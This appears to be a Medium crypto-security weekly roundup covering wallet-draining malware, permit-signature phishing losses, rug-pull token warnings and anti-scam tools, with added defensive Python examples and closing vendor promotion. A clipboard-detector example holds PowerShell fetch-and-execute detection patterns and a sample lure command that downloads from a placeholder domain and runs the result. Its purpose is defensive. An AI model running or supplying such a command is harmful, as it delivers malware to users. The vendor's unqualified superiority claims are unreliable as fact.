Scammers, Hacks, & Phishing as We Deliver Insights to Keep You Safe — “Crypto Security Truths”: Issue 29

Cyber Strategy Institute
12 min read · 1 day ago


Weekly Review of Top Cybersecurity Incidents, Topics, Tools and Issues in Web3, Crypto, and Blockchain Ecosystems

We have been capturing as much as we run across every week to find you clear examples of what not to do in the Cryptoverse in terms of risk, safety and security. We have captured a long list of topics this week in the following headings: Malware, Phishing, Scammers, & Tools so buckle up and learn how to protect yourself better in Crypto.

Our top thought leaders capture their own perspective on each category in the Analyst Takeaway notes.

10 Jan 25–17 Jan 25

Don’t forget you can vote up to 50 times a day for your favorite articles. We accept more than one vote.

Introduction

This week’s analysis dives deep into the ever-evolving tactics of crypto attackers, from sophisticated malware distributed via fake verification bots to phishing scams that exploit user trust and haste. We’ll explore incidents like a $57K loss from a contaminated CEX address and a $426K permit signature scam, alongside new warnings about honeypot tokens and wallet-centralized projects like $ROSSCOIN and $NEIRO. Adding to the intrigue, we spotlight cutting-edge security tools like MistTrack’s blockchain analysis suite and GoPlus Security’s plugin, which aim to counteract these growing threats. As scams grow more insidious and tools evolve to meet them, what can we learn to stay ahead of bad actors?

Malware

Increased Malware Targeting Wallet-Connect Users

Scammers are evolving beyond basic wallet-connect scams, using sophisticated malware distributed through fake verification bots, trading groups, and airdrop communities. These tactics allow attackers to access passwords, scan for wallet files, and steal sensitive data. Users are advised to avoid running unverified commands, installing unknown software, and falling for urgent group invites.

Fake Cloudflare Verification Pages Deploy Malware

Attackers are deploying malware through fake Cloudflare verification pages, tricking victims into executing malicious clipboard commands. These attacks involve clipboard injection, PowerShell commands, and persistence via Windows startup. Users should avoid running commands from unknown sources, verify website authenticity, and be cautious of clipboard-based verification methods.

Analyst Takeaway: Malware attacks are increasingly targeting crypto users through clever social engineering and technical manipulation, such as fake verification bots and Cloudflare pages. The evolving threat landscape highlights attackers’ ability to exploit human error and weak system defenses. Users must adopt zero-trust practices, validate software sources, and stay informed on emerging attack techniques to outmaneuver these threats.

Phishing

Copying Wrong CEX Address — User loses $57K

A victim suffered a $57,680 loss by inadvertently copying a contaminated CEX deposit address from a compromised transfer history. This highlights the critical importance of double-checking addresses during cryptocurrency transactions, as even a small oversight can result in significant financial losses.
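Address poisoning works because a poisoned history entry copies the first and last few characters of a genuine deposit address, which is all most people glance at. The check below, an added example that is not part of the original article, compares a pasted destination against a saved address book and flags entries that agree only at the ends; the addresses and labels are constructed placeholders.

```python
import re

HEX_ADDRESS = re.compile(r"^0x[0-9a-fA-F]{40}$")

# Constructed address book with placeholder addresses (not real deposit addresses).
ADDRESS_BOOK = {
    "cex-deposit": "0x1234" + "ab" * 16 + "5678",
    "cold-wallet": "0x9999" + "cd" * 16 + "0000",
}

def is_lookalike(candidate: str, known: str, edge: int = 4) -> bool:
    """True when two *different* addresses agree on their first and last `edge`
    hex digits, the shape a poisoned history entry is crafted to have so that a
    glance at the ends of the string looks right."""
    c, k = candidate.lower(), known.lower()
    return c != k and c[2:2 + edge] == k[2:2 + edge] and c[-edge:] == k[-edge:]

def check_destination(pasted: str, address_book: dict) -> tuple:
    """Classify a pasted destination against the saved address book.
    Returns (verdict, label): 'match' for an exact hit, 'lookalike' when only
    the visible ends match a saved entry, 'malformed' or 'unknown' otherwise."""
    if not HEX_ADDRESS.match(pasted):
        return ("malformed", None)
    for label, addr in address_book.items():
        if pasted.lower() == addr.lower():
            return ("match", label)
    for label, addr in address_book.items():
        if is_lookalike(pasted, addr):
            return ("lookalike", label)
    return ("unknown", None)

if __name__ == "__main__":
    # Constructed poisoned address: same first and last four digits, different middle.
    poisoned = "0x1234" + "ef" * 16 + "5678"
    print(check_destination(poisoned, ADDRESS_BOOK))  # ('lookalike', 'cex-deposit')
```

Only an exact match against a saved entry should be allowed through without a second look; a lookalike verdict is the signal that the transfer history has been seeded.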

Another “permit” signature captured WETH — user lost $135K

A victim lost $135,068 worth of Wrapped Ethereum (WETH) after falling prey to a phishing attack that exploited a malicious “permit” signature. This technique relies on tricking the user into signing a fraudulent transaction, granting the attacker access to their funds without needing private keys. By leveraging the deceptive nature of phishing and exploiting the victim’s trust, the attacker drained the funds seamlessly. The incident underscores the importance of carefully reviewing any signature request, verifying its legitimacy, and understanding the implications of the transaction before proceeding.

Another “permit” signature capture — user lost $426K

A victim lost $426,106 worth of USUALUSDC+ after unknowingly signing a phishing “permit” signature. This scam demonstrates how attackers exploit permissions to drain funds, emphasizing the need for users to verify transaction details and avoid signing unfamiliar requests.
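Both permit incidents above turn on the same mistake: signing an EIP-2612 `Permit` typed-data message whose fields were never read. The reviewer below is an added example, not code from the article or from any wallet; it decodes the request as a wallet would present it and flags an unknown spender, an unlimited allowance, and a deadline years away. The trusted-spender list, addresses and timestamps are constructed placeholders.

```python
import json

# EIP-2612 Permit message fields: Permit(owner, spender, value, nonce, deadline).
PERMIT_FIELDS = {"owner", "spender", "value", "nonce", "deadline"}
UINT256_MAX = 2**256 - 1
ONE_YEAR = 365 * 24 * 3600

def review_permit(typed_data_json: str, trusted_spenders: set, now: int) -> list:
    """Return warning codes for an eth_signTypedData request carrying a Permit.
    An empty list means nothing was flagged; it is not proof the request is safe."""
    data = json.loads(typed_data_json)
    if data.get("primaryType") != "Permit":
        return ["not-a-permit"]
    msg = data.get("message", {})
    if not PERMIT_FIELDS <= set(msg):
        return ["missing-fields"]
    flags = []
    trusted = {s.lower() for s in trusted_spenders}
    if msg["spender"].lower() not in trusted:
        flags.append("unknown-spender")      # who receives the allowance?
    if int(msg["value"]) == UINT256_MAX:
        flags.append("unlimited-value")      # the whole balance, now and in future
    deadline = int(msg["deadline"])
    if deadline > now + ONE_YEAR:
        flags.append("far-deadline")         # signature stays usable for years
    elif deadline < now:
        flags.append("expired")              # would revert on-chain; odd to be asked
    return flags

# Constructed sample request as a wallet would display it; placeholder addresses.
SAMPLE_REQUEST = json.dumps({
    "domain": {"name": "Sample Token", "version": "1", "chainId": 1,
               "verifyingContract": "0x" + "c0" * 20},
    "primaryType": "Permit",
    "message": {"owner": "0x" + "aa" * 20, "spender": "0x" + "bb" * 20,
                "value": str(UINT256_MAX), "nonce": "0",
                "deadline": "4102444800"},   # 2100-01-01 00:00:00 UTC
})
TRUSTED = {"0x" + "dd" * 20}   # placeholder for a router contract you have vetted
NOW = 1736899200               # 2025-01-15 00:00:00 UTC

if __name__ == "__main__":
    print(review_permit(SAMPLE_REQUEST, TRUSTED, NOW))
    # ['unknown-spender', 'unlimited-value', 'far-deadline']
```

A phishing permit usually trips all three flags at once, because the drainer wants the full balance, a spender it controls, and a signature that never expires.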

Fake Telegram Scams and Malicious Bots Target Crypto Users

A new wave of sophisticated scams targets crypto enthusiasts via fake Telegram groups impersonating popular influencers. These scams employ malicious bots and deceptive Cloudflare verification prompts that trick users into executing PowerShell commands through clipboard injections. The attack downloads malware disguised as “OneDrive.exe,” establishes persistence via Windows startup, and tampers with system settings. Red flags include unauthorized admin access requests and suspicious verification prompts. Users are advised to avoid running commands from untrusted sources, verify website authenticity, and remain cautious of clipboard-based attacks.
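The fake Cloudflare prompts described here and in the Malware section share one tell: the page copies a command to the clipboard and asks the visitor to paste it into the Run box. The detector below is an added example, not code from the article or from any product; it classifies clipboard text by whether it combines a shell launch with a fetch-or-decode-and-execute cue, the combination a legitimate verification step never needs. The cue patterns and sample strings are constructed, and the sample domain does not resolve.

```python
import re

# Cues of a "paste this to verify" lure, built from the behaviour described in
# the article: something that launches a shell plus something that fetches or
# decodes code to run. Constructed patterns, not a vendor signature set.
LAUNCH_CUES = [r"\bpowershell(\.exe)?\b", r"\bpwsh\b", r"\bmshta\b",
               r"\bcmd(\.exe)?\b.*\s/c\b"]
EXEC_CUES = [r"\biex\b", r"invoke-expression", r"\b(irm|iwr)\b",
             r"invoke-(webrequest|restmethod)", r"downloadstring",
             r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}",
             r"-w(indowstyle)?\s+hidden", r"https?://"]

def clipboard_verdict(text: str) -> tuple:
    """Classify clipboard text before it is pasted into Win+R or a terminal.
    'block' when a shell launch is combined with fetch/execute cues, 'warn'
    when only one side is present, 'ok' otherwise. Returns (verdict, hits)."""
    t = text.lower()
    launch = [p for p in LAUNCH_CUES if re.search(p, t)]
    execute = [p for p in EXEC_CUES if re.search(p, t)]
    if launch and execute:
        return ("block", launch + execute)
    if launch or execute:
        return ("warn", launch + execute)
    return ("ok", [])

# Constructed samples: a lure-shaped command pointing at an unusable domain,
# and an ordinary clipboard line from a real verification page.
LURE = 'powershell -w hidden -c "irm https://verify.example.invalid/check | iex"'
BENIGN = "Ray ID 8a1b2c3d - verify you are human"

if __name__ == "__main__":
    print(clipboard_verdict(LURE)[0], clipboard_verdict(BENIGN)[0])  # block ok
```

A genuine Cloudflare challenge never asks you to open the Run dialog, so anything that scores 'block' here is a lure regardless of what the page says.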

Phishing Attack Compromises @dawninternet’s Twitter Account

The Twitter account of @dawninternet was compromised and used to post phishing tweets, aiming to deceive followers into falling victim to scams. This incident underscores the importance of account security measures, such as enabling two-factor authentication and monitoring for suspicious activity, to prevent unauthorized access and potential losses.

Phishing Transaction Leads to $263K Loss in $VIRTUAL

A phishing scam resulted in a victim losing $263,255 worth of $VIRTUAL tokens after unknowingly signing a fraudulent transaction. This highlights the critical need for users to carefully scrutinize transaction details and avoid interacting with unknown or suspicious links to protect their digital assets.

Telegram Credential Scams via Phone Login Exploits

A new phishing method involves attackers requesting users’ phone numbers and Telegram login codes instead of injecting malicious code. Once they gain access to Telegram credentials, they can impersonate victims, manipulate contacts, and potentially orchestrate further scams. Users should exercise caution and avoid sharing sensitive login information, especially with unverified sources.

Analyst Takeaway: Phishing attacks remain the most effective vector for draining crypto wallets and stealing credentials. From malicious permit signatures to deceptive Telegram bots, attackers exploit trust and urgency to manipulate victims. The staggering financial losses underscore a critical need for better user education, rigorous address verification, and an unwavering skepticism toward unsolicited requests. Remember: haste in crypto is the gateway to compromise.

Scammers

Honeypot Tokens with Backdoors Exploit Transfers

Attackers have deployed malicious honeypot tokens, such as $NUDEAI and $MEGA, with backdoors hidden in smart contracts. These backdoors, now moved from SafeMath.mod() to MerkleProof.verifyCalldata(), allow unauthorized transfers of user assets. This underscores the importance of auditing contracts and avoiding interactions with unverified tokens to prevent financial losses.

Warden Highlights Bankless Email Scam

Warden raised awareness about a phishing scam targeting Bankless users with fake claimable rewards. By alerting the community, Warden reinforced the need for vigilance against email scams in the crypto space and emphasized the importance of proactive security measures to stay protected.

$ROSSCOIN Concerns

Crypto Rug Muncher warns against $ROSSCOIN, citing evidence from the Devsnightmare bot that insiders control over 15% of the token supply. Additionally, suspicious trading activity reveals that top traders made minimal purchases while cashing out large amounts, raising significant red flags. The token’s promotion by @blknoiz06 adds to skepticism, with the warning urging investors to proceed cautiously.

$TRUMP Scam Alert

$TRUMP, flagged as a high-risk token by Crypto Rug Muncher, is linked to the Solana Syndicate, notorious for orchestrating rug pulls. GMGN’s analysis reveals insider wallets dominating the top 100 holders, setting the stage for an inevitable rug pull. The warning advises avoiding the project to safeguard assets and steer clear of the syndicate’s other ventures.

$LUMI Risk Alert

$LUMI, labeled a bundled scam by Crypto Rug Muncher, is flagged for suspicious wallet activity. Fresh wallets exclusively holding $LUMI, purchased via Raydium, suggest the project is orchestrated for a rug pull. Investors are advised to avoid the token to protect their crypto assets.

$TRMXBT and Solana Syndicate Schemes

$TRMXBT is identified as another bundled scam tied to the Solana Syndicate. Known for orchestrating hundreds of rug pulls, the syndicate’s tactics involve using fake accounts to shill projects. The warning urges vigilance and avoidance of their promoted tokens to avoid losses.

$WULFY Scam Exposure

Crypto Rug Muncher highlights $WULFY as a project run by serial scammers, with the token dumping rapidly. Investors who ignored the warnings now face significant losses, showcasing the importance of identifying scams early.

$BLOCK Risk Warning

$BLOCK is deemed a high-risk bundled scam, with developers retaining nearly 55% of the token supply. Serial promoter Crypto Rover is pushing the token, raising additional concerns about a likely rug pull. The warning encourages thorough research before considering any involvement.

$CatTax Bundled Scam

Pay Cat Tax ($CatTax) is exposed as a bundled scam, with its developer distributing the token supply across hundreds of controlled wallets. This setup strongly indicates an impending rug pull, and investors are advised to avoid the project entirely.

$BALL Scam Alert

Crypto Ball ($BALL) is another fraudulent project linked to the Solana Syndicate. Like their previous scams, it is expected to end in a rug pull. Investors are urged to avoid the project to protect their assets from loss.

$NEIRO Wallet Centralization

Crypto Rug Muncher highlights concerning wallet connections in Binance-listed $NEIRO, using Bubblemaps v2 with Magic Nodes. After excluding exchanges from the map, the token appears highly centralized, contradicting its “community” branding.

Centralization before Binance listing and after.

$VIRTUAL on Base — Concerning Wallet Activity

Analyzing $VIRTUAL on Base with Bubblemaps v2 and Magic Nodes enabled reveals alarming wallet activity. The interconnectedness of wallets suggests potential risks, painting a grim picture of the token’s structure.

$MOG Wallet Web Raises Alarms

Crypto Rug Muncher expresses concerns about $MOG, where Bubblemaps 2.0 with Magic Nodes reveals an intricate web of interconnected wallets. While questioning if a Uniswap Router wallet might explain these links, the findings cast doubt on the project’s community-controlled claims, prompting calls for further analysis.

$PWH — Another Solana Syndicate Scam

Penguwifhat ($PWH) is flagged as a bundled scam orchestrated by the Solana Syndicate. Following their established pattern, this project is expected to end in a rug pull, leading to financial losses for investors. The warning advises avoiding this and similar scams.

Analyst Takeaway: The crypto landscape continues to be plagued by highly orchestrated scams, with bad actors leveraging insider tactics, wallet centralization, and deceptive promotions to rug unsuspecting investors. Projects linked to the Solana Syndicate and other fraudulent groups reinforce the importance of using tools like contract auditors and on-chain analysis to uncover hidden dangers. Blind trust in influencers or “hyped” tokens is a recipe for financial disaster.

Tools

Security Plugins for Crypto Protection

As crypto scams surge, tools like GoPlus Security’s plugin are becoming essential for safeguarding users. Backed by Binance, this plugin offers phishing site detection, risky transaction alerts, and more. Excitement is growing for their upcoming release of a security-enhanced plugin designed to empower ElizaOS agents with cutting-edge intelligence, signaling a new era of AI-driven crypto security solutions.

Revoke Multiple Approvals Made Easier

Revoke.cash introduced a long-awaited feature allowing users to revoke multiple approvals in a single transaction. This innovation is now possible thanks to advancements in account abstraction and smart contract wallets like Ambire Wallet, Safe, and AbstractChain. By simplifying approval management, this update represents a significant leap in usability and security for DeFi users.

Telegram Fake Safeguard Bot Detection

ScamSniffer has introduced a new Telegram-specific feature in its anti-scam extension to detect and alert users about suspicious “Safeguard” bots in real-time. This proactive measure aims to combat the rising threat of fake bots on Telegram targeting unsuspecting crypto users.

MistTrack’s Advanced Blockchain Analysis Tools

MistTrack offers a comprehensive suite of blockchain analysis tools, including address activity monitoring, OpenAPI integration, and AML screening for real-time “Know Your Trade” analysis. Users can privately track wallet activity, evaluate transaction histories, and utilize the platform’s risk assessment features. With flexible pricing plans and a free trial for professional users, MistTrack aims to simplify blockchain analysis for individuals, developers, and enterprises alike.

Bubblemaps Tool Reliability Issues

Crypto Rug Muncher criticizes the Bubblemaps V2 tool for its continued inaccuracies in mapping wallet connections. The tool either overstates or fails to detect wallet associations, particularly for newer projects. While acknowledging the tool’s potential, the criticism calls for improvements in accuracy and consistency to enhance its usability in analyzing crypto data effectively.

Analyst Takeaway: The rise in crypto scams has accelerated the need for security tools that empower users with proactive defense mechanisms. From GoPlus Security’s phishing detection to MistTrack’s advanced blockchain monitoring, these tools offer a lifeline for navigating a hostile crypto environment. However, gaps in reliability, such as Bubblemaps’ mapping issues, remind us that even the best tools require scrutiny and continuous improvement. Leveraging these innovations smartly can be the difference between safeguarding assets and becoming a victim.

Conclusion

This week’s key takeaway is clear: vigilance and education are the strongest defenses against the increasingly creative tactics of crypto attackers. Whether it’s malware exploiting social engineering, phishing scams manipulating urgency, or insider-controlled token schemes orchestrating rug pulls, the onus is on users to slow down, verify, and utilize emerging security tools. Analysts emphasize the need for zero-trust practices, thorough research, and leveraging tools like contract auditors and scam-detection plugins to expose hidden risks. Staying one step ahead of scammers isn’t just about tools — it’s about fostering a culture of skepticism and awareness in the crypto space.

Thanks for getting this far in our article. Don’t forget that you can vote up to 50 times a day for your favorite articles on Medium. We accept more than one vote, as it helps us spread Cybersecurity insights into Crypto. The more people who see this information, the more people we can help. We should share information about criminals and scammers to help protect each other, just like we pick up stray trash and put it in the trash can.

Further Resources about Cyber Strategy Institute:

If interested in other analysis, check out our other Crypto Security Medium articles and our In-depth Analysis articles, and for a daily understanding of the Cryptoverse follow our Twitter account. Relying on a dying Cybersecurity model is not a foundation for success; that is what Warden changes for the good!

Warden

Warden is designed around a Zero Trust model, stopping all known bad and unknown malicious threats. This starts by defending at the kernel level, so that software cannot tell it has been placed in a sandbox. We call this the “Inception Protection” model, which will not allow any program to impact your systems. No other system on the market can do this today. Protect your digital life, your family or your organization today with Warden!

If you want a 50% Discount on your purchase, then sign up for our newsletter, and we will send you the code for your support. Just reply to your first email saying you would like a discount.

Cyber Strategy Institute

Medium: https://cyberstrategy1.medium.com/

Twitter: https://twitter.com/CyberStrategy1

X: https://x.com/Warden_Secure

Website: https://cyberstrategyinstitute.com

Protect Yourself, Family or Business Today with Warden!

https://cyberstrategyinstitute.com/personal-protection-warden


Written by Cyber Strategy Institute

Crypto Security Truths - Scam Hunter, ZeroTrust Endpoint Defense & writing about all things Crypto Security. Stay up-to-date on latest Threats by following us!
